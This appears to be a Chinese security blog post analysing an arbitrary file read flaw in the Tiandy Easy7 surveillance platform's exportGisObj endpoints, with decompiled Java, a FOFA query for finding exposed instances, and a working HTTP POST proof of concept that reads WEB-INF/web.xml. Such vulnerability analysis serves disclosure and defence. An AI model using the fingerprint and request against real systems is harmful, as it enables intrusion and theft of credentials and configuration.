天地伟业Easy7 exportGisObj 文件读取漏洞


漏洞简介

天地伟业Easy7是一款用于视频监控管理的软件系统。

该系统的/Easy7/rest/gis/exportGisObj 和 /Easy7/rest/gisCore/exportGisObj接口存在前台任意文件读取漏洞,攻击者通过构造恶意路径参数(如WEB-INF/web.xml)可读取服务器上的任意文件,可能导致敏感信息泄露(如系统配置文件、用户凭证等)。由于天地伟业产品多用于关键基础设施领域,若存在公网暴露实例,可能带来严重的安全风险。

影响版本

fofa语法

body="/Easy7/apps/WebService/LogIn.jsp" || body="Easy7/VideoLib.EXE" || body="/Easy7/index.html" || (body="<img src=\"./images/ico/Easy7_logo_transparent.png") && title="平台"

漏洞分析

首先,该系统基于Spring 3.0,比较古老且WEB-INF/web.xml里没有配置任何filter进行权限校验,因此绝大部分接口都是可以直接访问的。

再来看本次的漏洞接口 /Easy7/rest/gis/exportGisObj 和 /Easy7/rest/gisCore/exportGisObj (这是审计时额外发现的,漏洞通告只有前者,可能是不同版本的区别)的对应方法exportGisObj()的实现逻辑

其中一个路径来自 com.tiandy.easy7.core.rest.CLS_REST_Gis#exportGisObj

@Controller
@RequestMapping({"/gis"})
public class CLS_REST_Gis {
    @Resource(
        name = "boGis"
    )
    private CLS_BO_Gis boGis;
    static WritableWorkbook wwb;
    @RequestMapping({"/exportGisObj"})
    public void exportGisObj(HttpServletRequest request, HttpServletResponse response, CLS_VO_Obj_ObjGis voObjGisObj) throws Exception {
        String filePath = request.getRealPath("/");
        String fileName = voObjGisObj.getFileName();
        if (null != fileName && !"".equals(fileName)) {
            Tools.outFile(response, fileName, filePath + fileName);
        } else {
            response.getWriter().println(JSONObject.fromObject(this.boGis.exportGisObj(voObjGisObj, filePath)));
        }

    }

另一个路径来自 com.tiandy.easy7.core.rest.CLS_REST_GisCore#exportGisObj 二者实现是一样的,只是来自不同的接口而已。

其中 request.getRealPath("/")获取的结果是当前应用的根目录,voObjGisObj.getFileName()返回的是用户传递的fileName参数;

其次,根据代码实现逻辑,我们需要跟进 Tools.outFile() 方法

public static void outFile(HttpServletResponse resp, String fileName, String fileUrl) throws IOException {
        ServletOutputStream out = resp.getOutputStream();
        fileName = URLEncoder.encode(fileName, "UTF-8");
        resp.setHeader("Content-disposition", "attachment;filename=" + fileName);
        BufferedInputStream bis = null;
        BufferedOutputStream bos = null;

        try {
            InputStream inputStream = new FileInputStream(fileUrl);
            bis = new BufferedInputStream(inputStream);
            bos = new BufferedOutputStream(out);
            byte[] buff = new byte[2048];

            int bytesRead;
            while((bytesRead = bis.read(buff, 0, buff.length)) != -1) {
                bos.write(buff, 0, bytesRead);
            }

到这里,这个文件读取漏洞的成因就非常清楚了:用户请求传递fileName参数,被直接拼接到new FileInputStream(fileUrl) fileUrl 部分进行文件操作,整个过程无任何校验或过滤,因此造成任意文件读取漏洞。

漏洞复现

POST /Easy7/rest/gis/exportGisObj HTTP/1.1
Host: easy7.mrxn.net
Content-Type: application/x-www-form-urlencoded

fileName=WEB-INF/web.xml

成功读取到WEB-INF/web.xml文件内容


手机扫码阅读

天地伟业Easy7 getActiveEffectTemp SQL注入漏洞

深信服运维安全管理系统 add_DNS 远程命令执行漏洞

评 论